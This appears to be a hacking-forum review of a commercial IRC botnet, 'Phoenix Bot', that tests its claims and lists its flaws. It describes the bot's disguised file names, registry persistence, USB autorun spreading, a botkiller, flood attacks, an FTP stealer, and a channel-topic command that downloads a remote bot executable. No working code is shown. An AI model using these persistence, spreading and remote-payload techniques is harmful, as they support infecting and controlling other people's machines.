Notice: The following statements are opinions and are to be treated as such.

1. Notice: The following statements are opinions and are to be treated as such.
2.  
3. I’ve wanted to analyze this bot for a while as the coder (Avenge) always boasts about his extensive knowledge of “C/C++”, so I expected a high quality primo bot. After obtaining/studying the bot, the word Disappointed pretty well sums it up. However, this bot is still one of the best IRC bots Hackforums.net has to offer.
4.  
5.  
6. 1). UNICODE Support
7.  
8. I recall Avenge posting in threads saying that “UNICODE Support” is basically #defining UNICODE in a header and using “UNICODE APIs” like wchar_t, RegSetKeyExW, etc (the W actually stands for WideChar). Now I was assuming Avenge would also have made his application a UNICODE build which would have validated his claim of UNICODE support. However since he did not make his application a UNICODE build, it did not matter whether he used just wide chars and wide char functions; They’re all ANSI regardless. The picture below supports my claim (Critical Core is Phoenix Bot):
9.  
10. Spoiler (Click to View)
11.  
12. Note: The Startup Test is my application, you can get the code here (True UNICODE FTW):
13. Code:
14. http://www.hackforums.net/showthread.php?tid=1271790
15.  
16. So, Phoenix IRC Bot does NOT have proper UNICODE Support.
17.  
18.  
19. 2). Runs as a critical system process?
20.  
21. After running the bot (on my Windows XP machine), the file melts to 2 locations:
22.  
23. %APPDATA%\\winlogon.exe (This file is run at startup and has a HKLM and HKCU entry and acts as a “loader”).
24. %ALLUSERSAPPDATA%\\syshost.exe (This is the running bot, executed by winlogon and has no registry entries).
25.  
26. If the registry values (HKCU or HKLM) were deleted or altered it would fix the key, so it does have registry persistence. However, if I modified either of the filenames or deleted the winlogon file, it would not fix either filenames/remelt. I was able to kill the syshost.exe file in the task manager, delete both files and the registry keys. If the bot was running as a system/critical process, I would have not been able to kill the syshost file in the first place.
27.  
28. Note: I did not send the !file.guard command or execute the !status command via IRC, the bot was just running normal.
29.  
30.  
31. 3). Server information is encrypted
32.  
33. I dumped the process memory and received a treasure trove of information, which included: IRC server, authhost, #channel, password, and the whole kitchen sink. Here’s the hex (I didn’t realign headers/fix file size and I don’t believe the bot will work even if you do so. I also removed/altered the info to protect the owner). Funny how the string “[Critical]: Running as critical system process” is in the dump, maybe there's a command to activate it(doubt it though). There is however a !visit command, that launches a URL in a hidden iexplorer.
34.  
35. Code:
36. http://pastebin.com/jWuaDPpg
37.  
38.  
39. 4). Signs of Aspergillus base
40.  
41. Nowhere in the sales thread did I see this bot claimed to be “coded from scratch”, so this is completely allowed. It’s actually kinda pointless to code an IRC bot completely from scratch, when all methods of utilizing winsock/parsing IRC lines have already been publicized. It does however make Avenge a huge hypocrite, since he runs around flaming everyone else for using it in their bots.
42.  
43. I). When the bot first connects, this data is sent for the USER info:
44.  
45. USER <random string> "" "lol" :<same random string>
46.  
47. This is the exact same method Aspergillus uses not only because of the matching random strings for username and full username, random string lengths, and the unique trademark “lol” for the host but the fact you don’t even need to send the quotation marks. If it was not Aspergillus, I believe a custom method would have been implemented.
48.  
49. II). If you kick the bot from your channel, the bot does not rejoin.
50.  
51. III). If you look at the memory dump, you will see all the constants (NICK....JOIN....PART....QUIT....PASS....PING....PONG....USER....PRIVMSG) together, just like in Aspergillus.
52.  
53. IV). Executes commands from the IRC channel topic.
54.  
55. V). I think it’s pretty safe to assume it also uses Aspergillus’s checkhost, since it doesn’t require a username/nick.
56.  
57. VI). If you look in the memory dump you will sell the good old .bat delete for uninstall, with ping used to sleep since you can’t sleep in batch. The script continued even after the bot was deleted, gave an error at shutdown, and brought my machine to a crawl.
58.  
59.  
60. 5). USB Spread
61.  
62. The autorun.inf method is exactly the same as the public one (only difference is it uses devices notifications, an example is on MSDN). The shortcuts are only added if it detects a “.docx” file. The downside of the shortcuts is the drive letter is static. So say for example you infected Drive D on one computer. When they place the USB drive into another computer and it’s drive E, the shortcuts will not work. Here are all the file contents:
63.  
64. Code:
65. http://pastebin.com/5vyMpzRK
66.  
67. The USB-Recovery-Tool.exe is the bot and both shortcuts execute the hidden winlogin (bot) file, just FYI.
68.  
69.  
70. 6). File Guard
71.  
72. This only works if the winlogon.exe file is renamed/deleted and there’s a pause. If for example I drag a blank winlogon.exe into the %APPDATA% folder and overwrite the existing “loader” winlogon.exe, the guard does not detect the change. Also if you kill syshost.exe, the guard fails. Another downside is you have to activate this feature yourself, which means if you don’t set the channel topic to !file.guard http://www.url.com/bot.exe, the guard will not work when the computer restarts. I would of thought this would of used a remotethread, but I guess it doesn't.
73.  
74.  
75. 7). Sort bots via country, bot version, and dependencies
76.  
77. The country, version, and java dependency works but on my Windows XP machine it was unable to detect that it had the .NET framework. Very minor bug but if its giving inaccurate results, it makes this function obsolete. The satire of this is the bot was crypted with a VB.NET crypter.
78.  
79.  
80. 8). BotKiller
81.  
82. The botkiller doesn't work in sandboxie (or on a normal user account I would assume), but it did work on my Windows XP machine, Admin account (not sure about Windows Vista/7). There is a major problem though, it only works ONE time (every time after, it didn’t do anything). All it killed was the system process/program ctfmon.exe in the %WINDOWS% folder, I recall reading it would only kill programs in the %APPDATA% or %TEMP% folder but I guess not. It also didn’t touch the HKLM files, not to method it uses system(“taskkill /f /IM %s”) and it displays a DOS CMD console for a split second. I remember Avenge laughing at other members for using this method, but look who’s using it now.
83.  
84. Note: Since Phoenix doesn't run as a critical process, I was able to Kill syshost.exe using Ganja’s botkiller(unmodified).
85.  
86.  
87. 9). HTTP and SYN Floods
88.  
89. I ran a local webserver and did not receive a single GET request when I was running the HTTP flood. The SYN flood is nothing more than a TCP connect/disconnect attack as shown in my webserver logs (didn't even appear to be multisocket). Can’t really say much about UDP flood, but I’m sure it works(maybe). Also, the dos.stop did not stop the flood.
90.  
91.  
92. 10). Conclusion
93.  
94. In closing, the download/update commands do work (expect on the UNICODE accounts), the ftp stealer works, as well as the other commands. I could probably find more flaws with this bot, however it’s pointless to continue the analysis as I never had any intention of using it. This just goes to show you, no one on this board is capable/intelligent enough to properly evaluate a product/know how it's suppose to function. Believe what you want about this bot, however sooner or later (I hope) you will realize that the Hackforums.net marketplace does not have either reputable sellers or products for that matter. Eventually you will find this out IRL when you go to (what seems like a reputable car dealer) and buy a car, only to discover down the road how much of a POS it is. I don't question Avenges ability to code but let it be clear he could care less about his Hackforums.net clients as he was only in it for the money and that he supplied a subpar product. Remember the only person you can trust is yourself, don't fall slave to others stupidity/ignorance/inadequacies.